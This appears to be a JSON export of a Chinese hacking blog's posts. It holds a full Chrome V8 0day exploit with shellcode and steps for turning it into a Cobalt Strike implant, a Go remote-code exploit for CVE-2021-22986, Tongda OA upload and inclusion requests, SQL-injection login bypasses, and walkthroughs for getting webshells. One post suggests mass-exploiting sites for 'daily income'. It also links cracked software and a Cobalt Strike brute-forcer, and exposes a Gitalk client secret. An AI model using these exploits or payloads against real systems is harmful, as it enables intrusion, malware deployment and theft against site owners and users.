this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} 仅用于学习,请不要用于违法犯罪!!!!","categories":[],"tags":[]},{"title":"cs批量爆破","slug":"cs批量爆破","date":"2021-09-17T13:04:28.000Z","updated":"2021-09-17T13:05:28.274Z","comments":true,"path":"2021/09/17/cs批量爆破/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/cs%E6%89%B9%E9%87%8F%E7%88%86%E7%A0%B4/","excerpt":"","text":"cs密码批量爆破显ip显示的更清楚 链接:https://pan.baidu.com/s/1Ht_SCsTIeZM7w-GS8hrhkQ提取码:1234复制这段内容后打开百度网盘手机App,操作更方便哦 之前改的大佬的没有显示ip,然后把ip显示了出来,就不用一个一个去找ip了,结合了单ip破解和多ip破解,ip.txt放ip,pass.txt放密码,结合fofa语句","categories":[],"tags":[]},{"title":"google-0day","slug":"google-0day","date":"2021-04-19T08:38:46.000Z","updated":"2021-04-19T08:42:48.619Z","comments":true,"path":"2021/04/19/google-0day/","link":"","permalink":"http://bo.vuvhz.top/2021/04/19/google-0day/","excerpt":"","text":"Cobalt Strike 利用 Chrome 0day 上线c x64POC (弹记事本的): <script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a = new ArrayBuffer(); } } let shellcode = [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 
0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00]; var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); var wasmModule = new WebAssembly.Module(wasmCode); var wasmInstance = new WebAssembly.Instance(wasmModule); var main = wasmInstance.exports.main; var bf = new ArrayBuffer(8); var bfView = new DataView(bf); function fLow(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(0, true)); } function fHi(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(4, true)) } function i2f(low, hi) { bfView.setUint32(0, low, true); bfView.setUint32(4, hi, true); return bfView.getFloat64(0, true); } function f2big(f) { bfView.setFloat64(0, f, true); return bfView.getBigUint64(0, true); } function big2f(b) { bfView.setBigUint64(0, b, true); return bfView.getFloat64(0, true); } class LeakArrayBuffer extends ArrayBuffer { constructor(size) { super(size); this.slot = 0xb33f; } } function foo(a) { let x = -1; if (a) x = 0xFFFFFFFF; var arr = new Array(Math.sign(0 - Math.max(0, x, -1))); arr.shift(); let local_arr = Array(2); local_arr[0] = 5.1;//4014666666666666 let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8 arr[0] = 0x1122; return [arr, local_arr, buff]; } for (var i = 0; i < 0x10000; ++i) foo(false); gc(); gc(); [corrput_arr, rwarr, corrupt_buff] = foo(true); corrput_arr[12] = 0x22444; delete corrput_arr; function 
setbackingStore(hi, low) { rwarr[4] = i2f(fLow(rwarr[4]), hi); rwarr[5] = i2f(low, fHi(rwarr[5])); } function leakObjLow(o) { corrupt_buff.slot = o; return (fLow(rwarr[9]) - 1); } let corrupt_view = new DataView(corrupt_buff); let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff); let idx0Addr = corrupt_buffer_ptr_low - 0x10; let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000; let delta = baseAddr + 0x1c - idx0Addr; if ((delta % 8) == 0) { let baseIdx = delta / 8; this.base = fLow(rwarr[baseIdx]); } else { let baseIdx = ((delta - (delta % 8)) / 8); this.base = fHi(rwarr[baseIdx]); } let wasmInsAddr = leakObjLow(wasmInstance); setbackingStore(wasmInsAddr, this.base); let code_entry = corrupt_view.getFloat64(13 * 8, true); setbackingStore(fLow(code_entry), fHi(code_entry)); for (let i = 0; i < shellcode.length; i++) { corrupt_view.setUint8(i, shellcode[i]); } main();</script> CS开启监听 监听器随意,https的稳定 生成payload 记得勾选64位 获得C的payload 类似这样 取出 shellcode 部分 全局替换 \\ 为 ,0 然后取出来shellcode 放入 chrome 0day 中 替换后 复制出来 放入文章开头的 POC 中 第7行 给shellcode 赋值数组 保存 成 msf.html chrome 浏览器 创建快捷方式到桌面 右键编辑快捷方式 增加 -no-sandbox 参数 关闭沙箱 在chrome浏览器打开 msf.html , CS 上线! 
payload c#weijs 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的c#function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { // var array = null; super( // at this point, the 4-byte allocation for the JSRegExp `this` object // has just happened. { toString: cb }, 'g' // now the runtime JSRegExp constructor is called, corrupting the // JSArray. ); // this allocation will now directly follow the FixedArray allocation // made for `this.data`, which is where `array.elements` points to. 
this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } // try{ var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 
gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"金和协同水平越权漏洞","slug":"金和协同水平越权漏洞","date":"2021-04-04T03:43:29.000Z","updated":"2021-04-04T03:59:22.311Z","comments":true,"path":"2021/04/04/金和协同水平越权漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E9%87%91%E5%92%8C%E5%8D%8F%E5%90%8C%E6%B0%B4%E5%B9%B3%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"0day 3.28 金和协同管理OA平台. 水平越权漏洞此洞是由 goddmeon 师傅挖掘并授权发表。 在此感谢 goddmeon 师傅。 FoFA语法: body=”金和协同管理平台” && country=”CN” 默认口令 admin / 000000 后台登录水平越权 C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=想要的id用户 这个id指的是用户编号 登录,用过用户管理,看到用户编号0001为董事长 这是admin管理员权限登录的界面 为了验证水平越权漏洞,我们登录一个普通用户账号,下面是普通用户登录后的界面。 访问url: 12http://www.xxxxxxx.net/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=0001 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"智慧教育越权","slug":"智慧教育越权","date":"2021-04-04T03:32:18.000Z","updated":"2021-04-04T03:33:37.215Z","comments":true,"path":"2021/04/04/智慧教育越权/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E8%B6%8A%E6%9D%83/","excerpt":"","text":"智慧教育平台越权上传漏洞通杀拿webshell 1.fofa语法: 1/Widget/common/Service/CommonWidgetService.asmx/Categorylist 2.漏洞越权位置 1/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0 有的会提示输入账号密码,直接访问这个注册,就可以注册 1Module/SSO/SJS_Register.aspx 可以登录个人后台, 3.登录后可以重普通用户越权到admin管理员用户 4.在个人页面抓包可以发现以get方式传输 试试有没有注入或者越权就加个?id=123 ?user=miko没有注入。。。。 当把user换成admin时 既然到了admin里面,这里应该有admin的cookie吧,于是直接又登录之前的越权漏洞地址,应该能到管理员后台 5.成功了 6.找上传点改filetype标签不行,加了个aspx,改了个aspx,还是不行,于是直接抓包,掏出burp 7.传不了,图片可以传,但是aspx传的时候进度条不动,。。。。卡住了,于是做图片马aspx加图片,哦呦,进去了,但是访问后报错 
于是找大佬问问,大佬也试了一下,大佬用的asp加图片,于是我也改asp加图片嘿嘿 8.成功拿下webshell 目前发现这套模板可以写个批量拿站脚本,日收益会很不错,有些这个模板已经修复了,但是查找的高达90%都有这些漏洞。 漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞 https://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247484986&idx=1&sn=55c43e01fb9cce6962272045c263fd83&chksm=c07fbdcef70834d8869f57ebd926e4237fb4379b317ac7aaa271a68c20ce99a5b054c283c7df&mpshare=1&scene=23&srcid=0404byavRK4wQ0q01VcNxxQ5&sharer_sharetime=1617496800125&sharer_shareid=f18a0e6ff07a610f239caab878f64be5#rd var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OA_v11.7文件上传","slug":"通达OA","date":"2021-03-23T13:38:16.000Z","updated":"2021-03-23T13:39:10.659Z","comments":true,"path":"2021/03/23/通达OA/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/%E9%80%9A%E8%BE%BEOA/","excerpt":"","text":"通达OA_v11.7 文件上传+文件包含 通达OA_v11.7 文件上传+文件包含1.任意用户登录 12/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 2.文件上传(后台) 123456789101112131415161718POST /general/reportshop/utils/upload.php?action=upload&newid=/../../../../general/reportshop/workshop/report/attachment-remark/ HTTP/1.1Host: 192.168.238.141Content-Length: 197Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk6YsCa9EZHcaYYulAccept: */*Accept-Encoding: gzip, deflateCookie:PHPSESSID=e30i0923fb8vol34kldc0sqhn7Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Connection: close------WebKitFormBoundaryk6YsCa9EZHcaYYulContent-Disposition: form-data; name="FILE1"; filename="ceshi.txt"Content-Type: text/plainhello 
world------WebKitFormBoundaryk6YsCa9EZHcaYYul-- 3.文件包含(后台) 12/ispirit/interface/gateway.php?json={}&url=general/reportshop/workshop/report/attachment-remark/}_ceshi.txt 利用链已在工具中更新 相对于redis那条利用链, 可优先使用它 和其他版本一样, 获取cookie后点击”后台getshell”即可(会自动识别v11.7版本的) 圈子专版 链接:https://pan.baidu.com/s/1VIuJ-5dZ0ENtpvUTfI-Vmw提取码:rjhd GitHub项目地址https://github.com/xinyu2428/TDOA_RCE var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-22986复现","slug":"CVE-2021-22986","date":"2021-03-23T13:34:37.000Z","updated":"2021-03-23T13:35:31.819Z","comments":true,"path":"2021/03/23/CVE-2021-22986/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/CVE-2021-22986/","excerpt":"","text":"CVE-2021-22986 复现数据包如下: 1234567891011POST /mgmt/tm/util/bash HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)Accept: */*Connection: closeAuthorization: Basic YWRtaW46X-F5-Auth-Token: Content-Length: 46Content-Type: application/json{"command": "run", "utilCmdArgs": "-c id"} 工具使用 go 简单写一下,代码有点 low 下载地址:https://github.com/yuyan-sec/Poc-Project/tree/main/F5相关代码: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778package mainimport ( "fmt" "net/http" "io/ioutil" "crypto/tls" "time" "bytes" "regexp" "strings" "flag")func main(){ var host,cmd string flag.StringVar(&host,"u","","URL: http://127.0.0.1") flag.StringVar(&cmd,"c","","CMD: id") flag.Parse() if host == "" || cmd == ""{ fmt.Println(`███████╗███████╗ ██████╗ ██████╗███████╗██╔════╝██╔════╝ ██╔══██╗██╔════╝██╔════╝█████╗ ███████╗ ██████╔╝██║ █████╗ ██╔══╝ ╚════██║ ██╔══██╗██║ ██╔══╝ 
██║ ███████║ ██║ ██║╚██████╗███████╗╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ CVE-2021-22986 Author: @yuyan-sec`) }else{ exp(host,cmd) }}func exp(url, cmd string){ t := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } c := &http.Client{ Transport: t, Timeout: 5 * time.Second, } url = strings.TrimRight(url,"/") url = url + "/mgmt/tm/util/bash" payload := []byte("{\\"command\\": \\"run\\", \\"utilCmdArgs\\": \\"-c "+ cmd +"\\"}") r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload)) r.Header.Set("Content-Type", "application/json") r.Header.Set("X-F5-Auth-Token", "") r.Header.Set("Authorization", "Basic YWRtaW46") resp, err := c.Do(r) if err != nil{ return } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil{ return } if resp.StatusCode == 200{ reg := regexp.MustCompile(`"commandResult":"(.*?)\\\\n`) commandResult := reg.FindAllStringSubmatch(string(body),-1) result := commandResult[0][1] result = strings.Replace(result,"context=system_u:system_r:initrc_t:s0","",-1) fmt.Println(result) }else{ fmt.Println("fail") }} [转]@yuyan大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MessageSolution邮件bug","slug":"MessageSolution","date":"2021-03-23T13:31:20.000Z","updated":"2021-03-23T13:32:43.615Z","comments":true,"path":"2021/03/23/MessageSolution/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/MessageSolution/","excerpt":"","text":"MessageSolution邮件归档系统EEA 信息泄露漏洞 Goby脚本编写简介:MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码. 
搜索语法 1title="MessageSolution Enterprise Email Archiving (EEA)" 漏洞地址http://ip:port/authenticationserverservlet/漏洞验证 得到一个管理员的账户密码 一个用户的账户密码 Goby脚本编写 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859{ "Name": "MessageSolution-Information-leakage", "Level": "3", "Tags": [], "GobyQuery": "title=\\"MessageSolution Enterprise Email Archiving (EEA)\\"", "Description": "", "Product": "", "Homepage": "https://www.secquan.org/", "Author": "Jaky", "Impact": "", "Recommandation": "", "References": [ "https://www.secquan.org/" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/authenticationserverservlet/", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "username", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "password", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-03-23 08:44:36", "GobyVersion": "1.8.255"} 脚本存放脚本验证 [转]@Jaky大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"phpstudy后门","slug":"phpstudy后门","date":"2021-03-09T10:57:47.000Z","updated":"2021-03-09T11:23:09.348Z","comments":true,"path":"2021/03/09/phpstudy后门/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/phpstudy%E5%90%8E%E9%97%A8/","excerpt":"","text":"#phpstudy后门利用创建靶机使用burp抓取数据包 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: 
'6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"锐捷RG-UAC","slug":"锐捷RG-UAC","date":"2021-03-09T10:47:53.000Z","updated":"2021-03-09T10:48:36.708Z","comments":true,"path":"2021/03/09/锐捷RG-UAC/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/%E9%94%90%E6%8D%B7RG-UAC/","excerpt":"","text":"#CNVD-2021-14536锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞 FOFA:title=\"RG-UAC登录页面\" && body=\"admin\" #检测#POC也没啥可POC的,ctrl+shift+i或者F12就是了接下来是欣赏马赛克的环节 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"驾校通网上约车系统漏洞分享","slug":"驾校通网系统漏洞","date":"2021-03-07T13:59:18.000Z","updated":"2021-03-07T14:09:50.860Z","comments":true,"path":"2021/03/07/驾校通网系统漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%A9%BE%E6%A0%A1%E9%80%9A%E7%BD%91%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#驾校通网上约车系统漏洞分享1039家校通网上约车系统是一款驾校一体化系统。北京壹零叁玖科技发展有限公司(简称1039公司)是国内第一家专业从事培训行业标准化软件开发和大型应用性平台的高科技企业,是培训行业信息化建设的最佳合作伙伴。 Google Hack: intitle: 1039家校通 ###漏洞利用###SQL注入万能密码影响版本: 家校通v1.0 - v.6.0 登录接口 /admin/Product/Comstye.aspx /Student/StudentLogin.aspx /Teacher/Index.aspx ###管理员 用户名密码均输入: ‘ or ‘’=’ (都是单引号)可直接进入。登陆后可任意修改网站内容 ###教练点评处存在SQL注入 /Teacher/TeacherPf.aspx?yid=0030 ###管理员后台增加分类处存在SQL注入# /admin/Product/comstye2.aspx /admin/yk/Index.aspx 配合SQL万能密码进入后台,然后访问:###后台管理编辑器任意文件上传上传文件 Burp抓包重放数据 模块,可以看到上传的地址; 访问路径 就是大马的地址WOW GETSHELL! 
","categories":[],"tags":[]},{"title":"CVE-2021-21972","slug":"CVE-2021-21972","date":"2021-03-07T13:56:13.000Z","updated":"2021-03-09T10:59:19.844Z","comments":true,"path":"2021/03/07/CVE-2021-21972/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/CVE-2021-21972/","excerpt":"","text":"#CVE-2021-21972 VMware vCenter GUI batch POC scanner#Tool interface: (just drag the .txt file into the window...)###Download address: https://github.com/admin360bug/GUI-POC-EXP/####About the EXP: already compiled; the tool runs without a Python environment","categories":[],"tags":[]},{"title":"Tongda OA v11.7 online user login vulnerability","slug":"通达OA登录漏洞","date":"2021-03-07T13:54:15.000Z","updated":"2021-03-09T10:41:18.732Z","comments":true,"path":"2021/03/07/通达OA登录漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#Tongda OA v11.7 online user login vulnerability###Vulnerability description: Tongda OA v11.7 has an interface that queries online users; when a user is online it returns that user's PHPSESSION, which allows logging in to the back-end system###Affected versions: Tongda OA < v11.7 ###Environment setup: https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe, download it and install following the steps###Reproduction: the file involved is 
MYOA\\webroot\\mobile\\auth_mobi.php","categories":[],"tags":[]},{"title":"Appscan_10.0.4破解版","slug":"Appscan-10-0-4破解版","date":"2021-03-07T13:47:41.000Z","updated":"2021-03-07T13:48:17.132Z","comments":true,"path":"2021/03/07/Appscan-10-0-4破解版/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/Appscan-10-0-4%E7%A0%B4%E8%A7%A3%E7%89%88/","excerpt":"","text":"#AppScan_10.0.4破解版 链接:链接:https://pan.baidu.com/s/1RarULLWDgijG3E1_KKMUBw提取码:53g8 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"foha批量查询脚本","slug":"foha","date":"2021-01-30T09:05:49.000Z","updated":"2021-03-07T13:32:23.371Z","comments":true,"path":"2021/01/30/foha/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/foha/","excerpt":"","text":"#分享一下fofa的批量查询脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#!/usr/bin/python3# -*- coding: utf-8 -*-# Author : 诚默import base64import jsonimport timeimport pandas as pdimport requestsfofa_mail = ''#通过fofa个人资料中获取fofa_key = ''#fofa_list = ['title', 'header', 'body', 'domain', 'icon_hash', 'host', 'port', 'ip', 'status_code', 'protocol', 'city', 'region', 'country', 'cert', 'banner', 'typ', 'os', 'server', 'app', 'after', 'asn', 'org', 'base_protocol', 'is_ipv6', 'is_domain', 'ip_ports', 'port_size', 'port_size_gt', 'port_size_lt', 'ip_country', 'ip_region', 'ip_city', 'ip_after', 'ip_before' ]def fofaapi(select): # 进行调用 page = 1 # 爬取几页数据,size为每页个数 size = 10 # 高级会员最大爬取前10000个 fields = "host,ip,port,title,country_name" # 返回的数据列 full = 'false' # 显示所有的数据,false显示当年的 base64_str = base64.b64encode(select.encode("utf-8")).decode('utf-8') api_url = 
'https://fofa.so/api/v1/search/all?email=' + fofa_mail + '&key=' + fofa_key + '&qbase64=' + base64_str + '&fields=' + fields + '&size=' + str( size) + '&page=' + str(page) + '&full=' + full r = requests.get(api_url) # 提交请求 text = json.loads(r.text.encode('gbk', 'ignore').decode('gbk')) # 获得dict数据 print(text) # 后续为写入表 columns = fields.split(',') # 数据列名 excel_list = text['results'] excel_list.insert(0, ["查询语句:" + str(select) + " 页数:" + str(page) + " 每页:" + str(size)]) # 写入初始的查询语句 dt = pd.DataFrame(excel_list, columns=columns) file = 'fofa' + time.strftime('%Y%m%d%H%M%S', time.localtime(time.time())) # 文件名为fofa+时间 dt.to_excel(file + ".xlsx", index=1, engine='xlsxwriter') #return textdef getselect(str):#格式化 select = "" comma_list = str.split(',') # 以逗号分组 (ip=1.1.1.1 | domain=baidu.com) for item in comma_list: equal_list = item.split('=') # 等号分组 ip | 1.1.1.1 if equal_list[0] in fofa_list: # 